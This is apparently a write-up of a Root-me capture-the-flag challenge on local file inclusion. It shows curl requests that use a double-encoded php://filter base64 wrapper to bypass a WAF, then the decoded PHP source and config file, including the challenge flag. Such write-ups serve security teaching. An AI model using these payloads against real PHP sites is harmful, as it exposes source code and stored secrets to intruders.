Root-me.org

Local File Inclusion - Double Encoding

Include can be dangerous.

We got another LFI challenge. This time the hint tells us that “include” can be dangerous and that we need to find the password in the source files of the website.

The owasp page of double encoding gives us a good idea on how and why it works.

https://www.owasp.org/index.php/Double_Encoding

So we need to get a hold of the source file. We know from a previous challenge that we can get a hold of a file using the php filter base64-encode.

So we’ll use that to request the files. When we click on the challenge we’re brought to the this page.

http://challenge01.root-me.org/web-serveur/ch45/

If we click on home, something gets append it to the url.

http://challenge01.root-me.org/web-serveur/ch45/index.php?page=home

We can use that url to request the home page via the php filter. We’ll be using double encoding to bypass their WAF.

To send a / we use %252F, which is %25= % and 2F is the value of /. So if we put the first and second together we end up with %2F which is the / that we need.

curl http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=home

PD9waHAgaW5jbHVkZSgiY29uZi5pbmMucGhwIik7ID8+CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICA8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDx0aXRsZT5KLiBTbWl0aCAtIEhvbWU8L3RpdGxlPgogIDwvaGVhZD4KICA8Ym9keT4KICAgIDw/PSAkY29uZlsnZ2xvYmFsX3N0eWxlJ10gPz4KICAgIDxuYXY+CiAgICAgIDxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWhvbWUiIGNsYXNzPSJhY3RpdmUiPkhvbWU8L2E+CiAgICAgIDxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWN2Ij5DVjwvYT4KICAgICAgPGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9Y29udGFjdCI+Q29udGFjdDwvYT4KICAgIDwvbmF2PgogICAgPGRpdiBpZD0ibWFpbiI+CiAgICAgIDw/PSAkY29uZlsnaG9tZSddID8+CiAgICA8L2Rpdj4KICA8L2JvZHk+CjwvaHRtbD4K

We get our base64 response, let’s decode it.

curl http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=home  | base64 -d

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   572    0   572    0     0   2353      0 --:--:-- --:--:-- --:--:--  2363

<?php include("conf.inc.php"); ?>
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>J. Smith - Home</title>
  </head>
  <body>
    <?= $conf['global_style'] ?>
    <nav>
      <a href="index.php?page=home" class="active">Home</a>
      <a href="index.php?page=cv">CV</a>
      <a href="index.php?page=contact">Contact</a>
    </nav>
    <div id="main">
      <?= $conf['home'] ?>
    </div>
  </body>
</html>

We can notice on the top there’s a include on this file. The title has a mention that includes are dangerous. So let’s fetch that file and decode it.

 curl http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=conf  | base64 -d
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2056    0  2056    0     0  11135      0 --:--:-- --:--:-- --:--:-- 11173

<?php
  $conf = [
    "flag"        => "Th1sIsTh3Fl4g!",
    "home"        => '<h2>Welcome</h2>
    <div>Welcome on my personal website !</div>',
    "cv"          => [
      "gender"      => true,
      "birth"       => 441759600,
      "jobs"        => [
        [
          "title"     => "Coffee developer @Megaupload",
          "date"      => "01/2010"
        ],
        [
          "title"     => "Bed tester @YourMom's",
          "date"      => "03/2011"
        ],
        [
          "title"     => "Beer drinker @NearestBar",
          "date"      => "10/2014"
        ]
      ]
    ],
    "contact"       => [
      "firstname"     => "John",
      "lastname"      => "Smith",
      "phone"         => "01 33 71 00 01",
      "mail"          => "[email protected]"
    ],
...

I didn’t include the whole file because the end is not necessary. We can clearly see the flag on the top of the file. So there it is.